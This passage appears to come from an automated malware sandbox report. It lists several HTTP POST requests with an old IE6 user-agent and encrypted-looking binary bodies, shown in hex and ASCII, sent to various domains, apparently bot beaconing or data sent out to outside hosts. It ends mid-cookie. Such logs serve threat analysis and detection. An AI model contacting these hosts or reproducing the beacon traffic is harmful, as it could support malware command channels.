                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 67 4a 55 2f 42 52 4a 76 67 56 57 30 56 6b 57 2f 78 63 4d 45 2f 78 58 32 6e 43 64 69 4f 4a 75 65 5a 74 34 45 42 73 4e 59 65 34 6b 69 57 41 6a 77 49 55 39 6b 69 30 7a 6b 4a 5a 32 68 30 34 37 53 44 37 74 32 42 52 54 47 4c 6a 47 51 30 74 63 72 62 50 4c 76 38 6a 49 35 7a 69 6e 4a 35 6e 35 39 69 78 57 6a 58 74 2b 53 64 6a 43 44 67 35 44 4b 69 6a 69 2b 4b 50 30 7a 7a 67 65 54 78 54 69 6d 66 4a 4b 59 52 51 49 6d 71 56 44 62 46 2b 34 74 46 54 57 76 6a 57 72 55 4e 68 44 44 6d 38 47 6f 32 6f 44 43 64 76 76 6b 44 70 4a 34 50 31 71 58 48 39 63 56 64 4f 31 68 6a 6a 4e 6d 4f 39 7a 6b 52 77 73 56 59 56 72 68 6e 4c 6b 4f 59 34 51 46 31 37 6a 77 33 6c 4d 6d 2f 53 61 41 2b 65 45 64 4a 47 70 55 76 62 78 56 74 2b 53 4f 61 35 46 4d 43 39 48 6e 6b 4e 6e 32 77 77 37 70 43 50 31 43 30 54 6c 35 65 52 42 73 58 52 38 72 31 6b 6b 46 62 6d 69 73 4a 35 36 65 66 4f 46 31 50 58 57 52 42 67 30 61 78 47 4f 54 54 51 54 46 42 43 56 4e 79 41 72 62 42 52 46 4a 6e 58 45 33 46 76 4c 50 2b 36 69 49 52 4e 52 56 76 76 63 55 68 62 38 37 4b 41 4e 70 66 76 58 32 6d 4f 79 69 37 44 32 4c 7a 76 37 6b 36 5a 59 77 34 42 4c 2f 31 79 33 34 4a 6d 4b 68 42 51 6a 42 6d 79 46 42 2f 54 65 58 61 77 44 57 6d 67 73 33 53 49 30 33 4d 36 77 44 49 31 41 32 74 41 47 32 45 38 5a 56 6c 77 64 32 34 4f 45 43 41 52 59 48 64 65 31 5a 6a 43 65 6c 7a 56 42 62 68 44 4b 56 42 2b 66 44 53 6c 47 50 56 69 66 59 77 54 39 6d 50 6e 58 66 63 4f 77 37 4d 54 45 76 77 45 6e 77 47 6f 37 50 77 65 42 78 37 51 4e 45 48 6b 2f 5a 58 75 39 37 48 7a 4f 62 53 46 61 4a 36 55 56 67 51 5a 30 2b 64 59 6a 6e 78 46 36 36 68 42 30 68 33 50 71 6d 34 57 30 77 2b 73 4d 59 48 6d 37 59 38 43 36 37 54 7a 55 6e 69 4e 50 72 2f 55 50 57 70 6b 6a 58 37 38 58 4c 70 51 32 75 56 4e 39 32 61 44 49 54 69 43 4a 30 30 53 5a 49 32 76 72 61 6f 72 53 6d 74 54 66 6e 38 52 66 41 47 6f 42 4f Data Ascii: gJU/BRJvgVW0VkW/xcME/xX2nCdiOJueZt4EBsNYe4kiWAjwIU9ki0zkJZ2h047SD7t2BRTGLjGQ0tcrbPLv8jI5zinJ5n59ixWjXt+SdjCDg5DKiji+KP0zzgeTxTimfJKYRQImqVDbF+4tFTWvjWrUNhDDm8Go2oDCdvvkDpJ4P1qXH9cVdO1hjjNmO9zkRwsVYVrhnLkOY4QF17jw3lMm/SaA+eEdJGpUvbxVt+SOa5FMC9HnkNn2ww7pCP1C0Tl5eRBsXR8r1kkFbmisJ56efOF1PXWRBg0axGOTTQTFBCVNyArbBRFJnXE3FvLP+6iIRNRVvvcUhb87KANpfvX2mOyi7D2Lzv7k6ZYw4BL/1y34JmKhBQjBmyFB/TeXawDWmgs3SI03M6wDI1A2tAG2E8ZVlwd24OECARYHde1ZjCelzVBbhDKVB+fDSlGPVifYwT9mPnXfcOw7MTEvwEnwGo7PweBx7QNEHk/ZXu97HzObSFaJ6UVgQZ0+dYjnxF66hB0h3Pqm4W0w+sMYHm7Y8C67TzUniNPr/UPWpkjX78XLpQ2uVN92aDITiCJ00SZI2vraorSmtTfn8RfAGoBO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 66 4a 38 63 6b 50 2b 52 6c 6c 55 5a 30 65 6f 35 33 76 63 6d 31 59 67 73 39 72 78 56 6a 74 70 32 6f 37 6d 47 2b 77 38 71 68 4a 44 4a 73 4c 30 48 61 67 67 51 67 48 67 53 70 2b 42 6e 67 73 76 48 58 59 47 47 4d 4c 55 61 53 6d 57 71 4b 62 71 4c 45 69 75 36 37 79 63 70 65 4f 35 48 66 42 69 42 6e 2b 42 37 38 39 4a 6e 43 72 6c 6e 43 4e 39 7a 70 30 4a 78 64 63 71 67 6e 33 75 49 6a 38 70 4c 4f 43 7a 63 4a 58 69 66 4b 34 4a 58 43 58 67 50 4b 36 6f 59 33 6a 65 34 55 5a 53 38 36 51 50 6c 63 69 6e 71 58 45 41 6c 38 65 6e 71 4c 64 48 68 58 6d 55 7a 72 64 35 64 6d 79 45 46 4d 6b 2b 46 41 49 7a 42 33 57 35 38 4c 48 37 71 2b 4d 4e 72 4c 36 37 50 69 31 77 53 45 64 7a 6c 62 49 34 53 32 46 49 79 49 58 34 46 4c 4e 6e 41 6f 2b 62 44 51 78 70 42 34 42 5a 4e 47 39 4a 38 4c 78 35 4d 54 79 70 5a 50 44 49 46 58 39 63 7a 61 5a 74 4c 7a 39 6f 4b 2b 55 7a 4a 37 70 68 7a 49 65 64 65 4d 78 56 70 48 31 74 37 66 44 35 42 2f 64 4e 48 35 4e 65 56 74 30 30 6d 34 75 43 45 69 75 38 38 64 75 63 77 30 74 6e 65 31 64 6f 50 71 4e 6f 56 6a 77 66 75 6b 37 37 2b 2f 53 34 4e 75 51 65 50 6b 4a 79 65 58 50 65 46 47 53 78 61 33 6b 75 68 2f 6e 73 65 46 75 75 77 55 66 56 2b 75 6b 54 41 53 47 62 30 76 74 6d 71 30 4e 33 76 4f 4c 71 4a 31 53 43 37 64 35 34 45 43 37 35 35 4f 4b 45 62 2f 33 34 74 4f 55 69 45 52 74 30 68 4b 6a 67 52 37 6d 30 33 78 34 56 42 33 36 72 30 66 54 35 69 51 49 4b 6b 72 6f 34 53 74 75 59 63 49 58 5a 31 71 71 70 68 61 6e 41 50 4f 55 36 6b 35 71 2f 64 2f 57 71 53 36 4b 67 49 54 32 5a 57 61 70 42 44 37 2b 48 30 53 74 34 31 6a 52 73 6a 48 6e 6a 47 6f 31 78 63 57 52 32 7a 31 4c 6b 62 68 65 71 32 78 4b 62 75 5a 4b 53 48 66 46 53 6f 52 63 58 6f 53 55 64 76 73 37 78 57 71 4a 45 56 6f 63 67 56 4e 48 4b 46 78 32 62 49 70 73 75 52 70 64 58 32 52 50 56 45 4e 2f 66 69 2f 41 3d 3d Data Ascii: fJ8ckP+RllUZ0eo53vcm1Ygs9rxVjtp2o7mG+w8qhJDJsL0HaggQgHgSp+BngsvHXYGGMLUaSmWqKbqLEiu67ycpeO5HfBiBn+B789JnCrlnCN9zp0Jxdcqgn3uIj8pLOCzcJXifK4JXCXgPK6oY3je4UZS86QPlcinqXEAl8enqLdHhXmUzrd5dmyEFMk+FAIzB3W58LH7q+MNrL67Pi1wSEdzlbI4S2FIyIX4FLNnAo+bDQxpB4BZNG9J8Lx5MTypZPDIFX9czaZtLz9oK+UzJ7phzIedeMxVpH1t7fD5B/dNH5NeVt00m4uCEiu88ducw0tne1doPqNoVjwfuk77+/S4NuQePkJyeXPeFGSxa3kuh/nseFuuwUfV+ukTASGb0vtmq0N3vOLqJ1SC7d54EC755OKEb/34tOUiERt0hKjgR7m03x4VB36r0fT5iQIKkro4StuYcIXZ1qqphanAPOU6k5q/d/WqS6KgIT2ZWapBD7+H0St41jRsjHnjGo1xcWR2z1Lkbheq2xKbuZKSHfFSoRcXoSUdvs7xWqJEVocgVNHKFx2bIpsuRpdX2RPVEN/fi/A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 47 73 46 32 45 62 4c 54 45 34 34 43 48 46 4f 67 35 5a 38 72 42 72 58 6a 61 6e 2b 43 53 56 35 56 42 6e 31 62 57 51 65 33 50 55 61 54 47 66 64 71 55 47 7a 6e 59 7a 69 65 79 53 53 55 5a 51 71 51 4f 2b 65 4d 2b 77 42 72 33 44 48 56 62 5a 47 50 59 44 4e 79 5a 71 42 74 7a 34 69 37 70 71 77 73 64 6c 50 46 31 4b 77 6a 73 37 31 6c 4d 58 6c 61 53 6f 67 50 6d 47 49 65 32 44 5a 72 68 75 4d 36 6e 74 67 6e 56 43 66 48 70 42 7a 56 70 49 67 65 32 78 2b 34 4b 47 74 70 45 55 69 54 50 52 56 6b 31 76 49 34 38 76 5a 56 71 78 33 52 32 72 44 57 57 56 4b 63 38 67 54 6c 77 6b 32 47 75 49 7a 67 56 52 4a 55 34 33 30 30 5a 57 66 71 65 51 52 63 39 4e 71 55 34 43 47 61 68 66 37 31 4a 34 36 59 66 4b 54 5a 31 6d 48 35 39 44 79 50 6f 32 4d 59 43 6b 46 78 4b 41 73 6a 42 49 6d 69 73 42 69 78 74 54 6a 6a 49 55 45 4e 49 66 37 6c 5a 44 36 66 4a 45 51 64 73 47 4f 45 70 69 52 73 75 37 63 53 6d 6e 2b 6c 65 59 77 66 59 64 61 55 4f 67 37 36 41 6c 6c 5a 77 76 45 41 48 52 54 58 30 6c 6a 6f 73 65 56 4e 50 6c 55 6e 6e 4f 56 75 78 57 76 6d 44 46 44 58 75 33 4a 6f 7a 6b 68 4f 76 68 54 76 55 79 68 5a 64 69 78 72 4c 4b 7a 74 34 6d 49 66 59 6c 70 49 33 46 49 67 6b 39 67 37 43 44 72 32 5a 73 58 6d 75 79 49 54 79 64 45 71 34 54 68 50 45 73 30 5a 57 6c 6b 47 34 66 65 34 6f 59 54 41 34 73 4b 79 41 6b 6a 57 51 32 7a 54 2b 61 2b 72 79 42 52 4b 4d 6a 38 71 48 64 65 4b 34 6c 36 4f 4c 56 4d 44 31 30 68 75 36 71 55 67 39 6c 7a 32 47 6a 6b 58 7a 71 53 39 6e 69 4d 79 53 2f 67 4d 6d 6e 53 66 72 41 5a 58 2b 65 49 47 6b 4b 54 4e 66 59 48 61 64 36 77 41 58 44 66 5a 58 76 6d 58 79 49 31 4e 47 55 35 53 70 68 37 2f 54 48 6e 57 4d 4d 4b 30 56 6f 79 57 65 6f 34 42 7a 61 6d 4f 33 61 42 7a 79 54 71 4e 79 6c 54 6f 63 43 31 62 50 70 59 32 6e 4c 63 4e 69 79 61 71 6e 61 4c 43 2f 50 73 54 Data Ascii: GsF2EbLTE44CHFOg5Z8rBrXjan+CSV5VBn1bWQe3PUaTGfdqUGznYzieySSUZQqQO+eM+wBr3DHVbZGPYDNyZqBtz4i7pqwsdlPF1Kwjs71lMXlaSogPmGIe2DZrhuM6ntgnVCfHpBzVpIge2x+4KGtpEUiTPRVk1vI48vZVqx3R2rDWWVKc8gTlwk2GuIzgVRJU4300ZWfqeQRc9NqU4CGahf71J46YfKTZ1mH59DyPo2MYCkFxKAsjBImisBixtTjjIUENIf7lZD6fJEQdsGOEpiRsu7cSmn+leYwfYdaUOg76AllZwvEAHRTX0ljoseVNPlUnnOVuxWvmDFDXu3JozkhOvhTvUyhZdixrLKzt4mIfYlpI3FIgk9g7CDr2ZsXmuyITydEq4ThPEs0ZWlkG4fe4oYTA4sKyAkjWQ2zT+a+ryBRKMj8qHdeK4l6OLVMD10hu6qUg9lz2GjkXzqS9niMyS/gMmnSfrAZX+eIGkKTNfYHad6wAXDfZXvmXyI1NGU5Sph7/THnWMMK0VoyWeo4BzamO3aBzyTqNylTocC1bPpY2nLcNiyaqnaLC/PsT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 52 31 57 6f 71 2f 78 32 6c 31 58 2b 39 5a 68 41 70 32 59 6b 6a 59 39 48 4d 4f 4b 55 5a 33 65 2f 38 4c 38 39 36 32 59 47 73 55 42 43 50 58 54 4d 57 68 55 54 63 41 4a 64 6c 72 43 42 4e 5a 43 6e 68 6f 49 67 43 64 4d 79 51 44 41 71 59 37 33 53 41 54 64 5a 67 6e 41 39 77 2b 75 78 73 71 56 42 74 45 38 69 77 43 61 52 34 37 49 42 73 32 4f 49 57 6a 4b 36 59 39 39 37 41 59 77 42 4f 35 35 38 6f 34 5a 43 38 51 71 33 6b 32 6c 54 7a 69 58 37 54 69 6d 45 73 69 6d 5a 55 67 76 39 42 52 54 33 54 44 57 6a 32 4b 67 62 45 62 77 38 72 61 50 5a 63 45 56 65 52 66 36 41 76 54 61 57 56 6a 57 67 62 6b 6f 36 2f 49 4c 6d 32 52 53 6d 64 41 44 4e 39 2b 37 50 45 35 4f 61 69 64 44 2b 39 63 62 69 37 46 76 6b 6f 7a 4c 65 4c 76 6d 2f 2b 56 31 46 45 77 33 71 4e 42 63 30 61 69 39 36 2b 52 66 5a 30 35 55 51 4d 41 68 4f 77 51 2b 2f 37 4e 41 4c 37 35 58 56 4b 67 52 6f 6d 55 34 75 45 39 4a 4a 2b 50 4b 4c 53 57 50 6d 4d 49 78 55 78 32 77 42 44 65 7a 4d 4d 36 77 48 4b 39 6d 4b 44 58 32 78 53 49 32 53 6e 74 65 54 78 39 69 4f 64 31 77 69 79 74 6b 65 79 2f 45 33 68 68 2f 50 33 4e 45 4f 2b 69 54 71 7a 53 46 5a 58 6c 61 62 55 49 36 6c 4e 67 58 7a 68 63 35 57 6d 38 49 48 76 7a 76 57 2f 6f 55 4b 49 70 31 5a 4d 61 30 31 66 67 39 79 7a 2f 34 46 69 6d 36 58 72 32 74 32 31 6e 76 55 31 57 79 59 6f 41 52 4f 56 76 61 64 6f 6d 43 35 69 64 57 77 34 33 2f 34 38 31 6f 72 39 56 39 71 54 48 72 69 5a 53 57 44 36 33 56 32 6b 74 48 72 55 77 45 78 56 4d 4f 4f 64 77 69 46 72 55 38 6b 72 34 70 52 6a 4b 5a 78 4b 34 2b 77 4d 4e 77 6f 55 63 77 65 73 30 42 34 30 74 74 62 68 5a 59 6f 75 61 2b 51 4c 77 67 41 71 4f 72 62 5a 48 64 61 39 7a 5a 59 39 4d 2f 71 49 56 62 72 54 4f 6f 32 53 48 4f 76 58 6a 41 6b 76 76 59 31 64 75 50 45 32 38 31 36 42 70 66 41 Data Ascii: R1Woq/x2l1X+9ZhAp2YkjY9HMOKUZ3e/8L8962YGsUBCPXTMWhUTcAJdlrCBNZCnhoIgCdMyQDAqY73SATdZgnA9w+uxsqVBtE8iwCaR47IBs2OIWjK6Y997AYwBO558o4ZC8Qq3k2lTziX7TimEsimZUgv9BRT3TDWj2KgbEbw8raPZcEVeRf6AvTaWVjWgbko6/ILm2RSmdADN9+7PE5OaidD+9cbi7FvkozLeLvm/+V1FEw3qNBc0ai96+RfZ05UQMAhOwQ+/7NAL75XVKgRomU4uE9JJ+PKLSWPmMIxUx2wBDezMM6wHK9mKDX2xSI2SnteTx9iOd1wiytkey/E3hh/P3NEO+iTqzSFZXlabUI6lNgXzhc5Wm8IHvzvW/oUKIp1ZMa01fg9yz/4Fim6Xr2t21nvU1WyYoAROVvadomC5idWw43/481or9V9qTHriZSWD63V2ktHrUwExVMOOdwiFrU8kr4pRjKZxK4+wMNwoUcwes0B40ttbhZYoua+QLwgAqOrbZHda9zZY9M/qIVbrTOo2SHOvXjAkvvY1duPE2816BpfA
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 35 51 6e 6a 73 6e 6a 42 45 49 37 33 79 62 49 4a 2b 35 59 57 42 57 73 44 4a 7a 44 41 4b 56 52 63 4c 4a 54 43 36 67 5a 53 51 37 31 55 47 79 7a 4e 49 72 52 48 57 53 33 49 66 4f 44 5a 37 41 64 68 4d 4f 70 4d 43 4c 69 52 47 50 4c 70 6a 6a 7a 52 4e 59 2b 55 50 46 73 6e 63 61 72 75 56 6c 51 52 37 2b 73 35 63 51 45 6e 52 48 46 76 31 43 61 41 4e 61 76 6b 63 66 51 2b 51 35 7a 55 65 71 51 53 70 2b 42 45 42 71 4f 7a 66 4e 59 78 79 63 78 61 30 6c 41 49 6d 65 44 4a 6e 36 43 38 44 6c 56 75 54 43 4f 73 53 4c 58 4e 31 47 52 4c 72 32 6c 73 75 4b 54 70 58 35 6e 5a 43 46 58 56 48 65 38 58 77 42 6b 30 5a 52 4c 4a 77 74 45 44 5a 34 6a 33 72 67 59 58 5a 61 30 4e 78 32 77 44 46 69 2f 46 62 46 49 52 36 38 57 37 79 39 6f 51 37 50 53 58 44 6f 74 59 70 2f 56 52 62 52 6f 61 57 62 6a 2f 4b 55 63 67 64 41 48 46 51 4c 74 30 52 50 63 71 6a 79 59 75 75 63 2b 6c 68 35 70 2b 51 2b 41 4c 30 35 66 4b 5a 32 32 31 2b 45 30 73 70 71 61 42 55 32 46 32 71 6d 31 49 44 76 6e 59 73 58 5a 70 45 41 77 34 4d 58 56 4d 54 49 6e 62 6b 69 6a 69 37 73 49 4a 50 30 62 44 63 63 5a 39 4d 4d 55 31 52 73 50 4a 6a 48 50 4a 36 41 2f 37 73 73 6b 41 52 51 6b 78 75 58 52 2f 64 76 4c 50 56 41 75 47 56 53 69 72 46 6c 64 70 4a 79 34 65 79 48 35 4d 32 53 32 2b 68 75 72 6a 76 66 2b 4f 61 31 47 79 4a 71 77 38 4b 53 30 56 4a 55 43 41 52 63 6a 6b 68 74 76 30 46 54 47 4a 30 7a 5a 67 30 71 33 4b 53 6b 68 78 70 54 2b 48 35 64 37 67 53 75 78 6a 6e 39 6a 77 7a 50 79 38 5a 45 42 72 33 77 42 6a 6a 74 6f 61 77 36 78 4e 33 49 4e 74 70 72 4c 41 66 31 78 70 4e 61 71 6c 57 4f 41 7a 69 57 39 4a 6a 71 47 71 74 2f 45 52 74 38 42 63 31 63 39 55 34 54 7a 62 47 43 5a 39 39 4e 71 7a 7a 41 38 77 69 64 6f 51 45 32 35 50 47 50 38 3d Data Ascii: 5QnjsnjBEI73ybIJ+5YWBWsDJzDAKVRcLJTC6gZSQ71UGyzNIrRHWS3IfODZ7AdhMOpMCLiRGPLpjjzRNY+UPFsncaruVlQR7+s5cQEnRHFv1CaANavkcfQ+Q5zUeqQSp+BEBqOzfNYxycxa0lAImeDJn6C8DlVuTCOsSLXN1GRLr2lsuKTpX5nZCFXVHe8XwBk0ZRLJwtEDZ4j3rgYXZa0Nx2wDFi/FbFIR68W7y9oQ7PSXDotYp/VRbRoaWbj/KUcgdAHFQLt0RPcqjyYuuc+lh5p+Q+AL05fKZ221+E0spqaBU2F2qm1IDvnYsXZpEAw4MXVMTInbkiji7sIJP0bDccZ9MMU1RsPJjHPJ6A/7sskARQkxuXR/dvLPVAuGVSirFldpJy4eyH5M2S2+hurjvf+Oa1GyJqw8KS0VJUCARcjkhtv0FTGJ0zZg0q3KSkhxpT+H5d7gSuxjn9jwzPy8ZEBr3wBjjtoaw6xN3INtprLAf1xpNaqlWOAziW9JjqGqt/ERt8Bc1c9U4TzbGCZ99NqzzA8widoQE25PGP8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 6e 5a 32 6d 72 44 35 2f 6c 31 55 61 67 54 4c 34 43 52 33 68 58 69 46 7a 6e 61 48 2b 47 61 41 34 55 76 50 6e 4b 77 36 6e 55 51 4d 35 44 4f 7a 61 61 6b 43 78 43 51 41 54 43 50 62 59 2f 70 54 4a 6a 2f 33 4f 48 72 70 73 39 41 79 34 68 6d 4c 35 33 39 4d 69 4f 79 51 31 48 30 73 4a 6a 73 2b 37 69 38 76 52 42 45 4b 63 7a 68 56 36 70 63 65 42 49 56 46 62 53 45 2b 53 71 31 4e 75 70 45 48 64 75 4f 75 4b 4b 70 7a 57 4c 4f 65 45 59 46 38 43 65 4a 72 62 38 72 78 78 50 44 38 76 4d 34 6a 72 39 76 59 75 6e 64 41 65 48 70 7a 2b 65 57 69 70 6f 54 74 51 73 66 68 48 62 52 42 6c 6c 78 36 68 61 49 6e 6a 73 79 66 73 2b 70 6f 6c 4c 49 51 59 76 72 4d 6a 65 4f 38 34 68 58 2b 42 64 66 67 6e 76 48 39 59 55 54 6e 46 65 62 62 42 62 54 4f 2f 77 4d 75 66 76 51 34 46 4e 33 71 6d 73 55 42 71 58 6e 77 56 68 46 47 65 5a 71 35 6e 2b 6b 37 68 42 4e 32 53 55 4e 33 6a 36 35 33 34 45 42 4b 45 54 72 36 68 42 4d 48 34 36 49 49 78 66 6f 73 78 4f 6a 38 56 64 64 2b 68 37 67 4d 59 70 4f 33 78 52 64 57 36 74 34 34 4b 6e 70 4d 30 7a 51 73 30 6e 51 6e 51 74 51 5a 50 71 49 4d 54 39 72 4b 4b 6f 38 45 36 36 62 2f 44 6a 51 44 70 35 37 4f 32 73 72 70 58 44 6c 68 73 49 4b 78 31 73 34 47 78 49 64 6e 31 38 58 34 38 54 66 68 62 4e 74 48 37 72 42 63 53 55 6c 43 47 66 4b 47 77 73 6e 4b 75 70 77 39 33 67 44 31 52 41 78 30 71 48 78 70 7a 75 63 31 4d 34 59 48 6d 72 76 54 63 2b 62 39 46 78 33 71 4d 62 76 6f 50 66 4a 53 6d 35 76 61 42 6d 35 48 70 6e 7a 4e 61 71 6d 66 61 73 79 51 50 6d 35 61 35 31 58 58 6b 55 70 5a 53 4f 4b 37 76 37 39 77 78 4d 76 49 77 5a 32 44 73 35 77 6c 62 4f 73 50 4f 66 51 2f 7a 68 66 47 71 64 6b 66 4f 48 55 2f 5a 41 6d 54 5a 6f 4b 66 43 58 4f 4b 67 63 4d 51 38 64 52 72 43 47 79 46 63 35 39 58 46 63 4b 6b 66 50 36 71 6e 49 50 72 52 52 33 44 43 71 75 6d 57 4f 63 71 75 53 37 51 6f 6a 39 52 34 6f 4d 48 68 31 59 6b 4d Data Ascii: nZ2mrD5/l1UagTL4CR3hXiFznaH+GaA4UvPnKw6nUQM5DOzaakCxCQATCPbY/pTJj/3OHrps9Ay4hmL539MiOyQ1H0sJjs+7i8vRBEKczhV6pceBIVFbSE+Sq1NupEHduOuKKpzWLOeEYF8CeJrb8rxxPD8vM4jr9vYundAeHpz+eWipoTtQsfhHbRBllx6haInjsyfs+polLIQYvrMjeO84hX+BdfgnvH9YUTnFebbBbTO/wMufvQ4FN3qmsUBqXnwVhFGeZq5n+k7hBN2SUN3j6534EBKETr6hBMH46IIxfosxOj8Vdd+h7gMYpO3xRdW6t44KnpM0zQs0nQnQtQZPqIMT9rKKo8E66b/DjQDp57O2srpXDlhsIKx1s4GxIdn18X48TfhbNtH7rBcSUlCGfKGwsnKupw93gD1RAx0qHxpzuc1M4YHmrvTc+b9Fx3qMbvoPfJSm5vaBm5HpnzNaqmfasyQPm5a51XXkUpZSOK7v79wxMvIwZ2Ds5wlbOsPOfQ/zhfGqdkfOHU/ZAmTZoKfCXOKgcMQ8dRrCGyFc59XFcKkfP6qnIPrRR3DCqumWOcquS7Qoj9R4oMHh1YkM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 2b 30 6d 5a 48 39 67 36 6d 31 57 53 41 6b 58 6c 32 77 44 62 4c 63 75 6a 4c 39 75 67 7a 67 6f 6c 6a 43 73 57 6f 70 56 4e 6b 4a 62 48 64 68 39 6a 65 61 36 77 53 7a 50 73 5a 65 63 38 43 59 4e 68 4b 65 52 58 46 6d 79 75 32 4b 4f 55 36 32 63 4b 43 2f 75 72 6e 66 73 37 43 4f 4c 2b 63 49 2b 4d 4d 59 76 30 38 78 52 61 53 31 32 32 68 76 79 4a 6a 64 70 35 7a 36 64 66 2f 66 71 65 72 31 4c 6c 37 47 68 6c 46 4c 71 31 61 6a 57 72 44 54 70 50 42 54 2f 74 45 44 4e 7a 5a 6a 43 42 41 49 7a 76 2b 62 56 77 39 30 77 64 7a 2b 34 6b 79 65 41 41 5a 37 6c 2b 55 46 66 45 7a 61 55 30 55 74 7a 74 6e 79 43 65 35 46 2b 50 68 62 2b 65 6e 2b 64 47 54 46 65 47 45 46 65 63 74 62 5a 35 2b 45 35 62 30 52 59 4a 65 4f 36 7a 45 37 30 35 42 4c 52 64 41 65 49 72 65 6a 4a 65 54 59 39 30 70 64 6e 61 4e 38 56 5a 5a 59 53 4f 4f 70 2f 58 52 4a 39 76 64 72 4d 2f 58 32 77 6d 79 65 49 53 6b 41 79 63 67 36 54 66 35 67 36 47 34 48 30 43 66 6c 51 64 79 6f 58 4e 63 6f 4d 50 34 51 71 31 6e 6d 75 48 63 32 2b 6a 31 7a 71 59 74 34 7a 74 63 68 6a 79 43 49 4c 43 65 31 65 34 58 77 2f 4b 63 6a 2f 58 48 6a 41 62 6f 76 7a 4f 64 46 49 6a 6f 47 41 4f 45 69 73 79 74 47 6b 49 37 34 66 42 6b 6a 55 6c 63 4d 57 64 6f 66 34 2f 66 2f 2f 2f 77 5a 46 6f 53 50 2f 4b 4e 70 63 65 67 6c 45 6d 39 57 61 53 56 48 79 6d 36 50 56 6c 46 44 35 56 47 7a 51 50 68 41 6f 35 35 76 36 54 66 34 48 67 57 5a 6e 7a 34 33 6f 37 70 65 55 69 6e 43 48 4b 64 54 42 74 63 62 6e 56 78 57 4d 68 68 7a 64 67 76 47 31 79 6a 6f 41 4b 72 49 52 75 7a 64 50 74 54 4a 49 49 75 4e 66 45 63 55 4b 34 45 54 6d 65 56 44 7a 69 75 72 59 31 4a 70 6f 67 50 57 6b 56 51 71 73 4b 69 70 35 64 62 54 73 50 43 4b 5a 57 72 30 72 73 55 49 78 46 6c 38 36 68 5a 63 70 6c Data Ascii: +0mZH9g6m1WSAkXl2wDbLcujL9ugzgoljCsWopVNkJbHdh9jea6wSzPsZec8CYNhKeRXFmyu2KOU62cKC/urnfs7COL+cI+MMYv08xRaS122hvyJjdp5z6df/fqer1Ll7GhlFLq1ajWrDTpPBT/tEDNzZjCBAIzv+bVw90wdz+4kyeAAZ7l+UFfEzaU0UtztnyCe5F+Phb+en+dGTFeGEFectbZ5+E5b0RYJeO6zE705BLRdAeIrejJeTY90pdnaN8VZZYSOOp/XRJ9vdrM/X2wmyeISkAycg6Tf5g6G4H0CflQdyoXNcoMP4Qq1nmuHc2+j1zqYt4ztchjyCILCe1e4Xw/Kcj/XHjAbovzOdFIjoGAOEisytGkI74fBkjUlcMWdof4/f///wZFoSP/KNpceglEm9WaSVHym6PVlFD5VGzQPhAo55v6Tf4HgWZnz43o7peUinCHKdTBtcbnVxWMhhzdgvG1yjoAKrIRuzdPtTJIIuNfEcUK4ETmeVDziurY1JpogPWkVQqsKip5dbTsPCKZWr0rsUIxFl86hZcpl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWktVSVIyZVF0YlVLSEV3bThjd0V3Z0FBQUFzIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaS1VJUjJlUXRiVUtIRXdtOGN3RXdnQUFBQXMiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjYwNCIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyB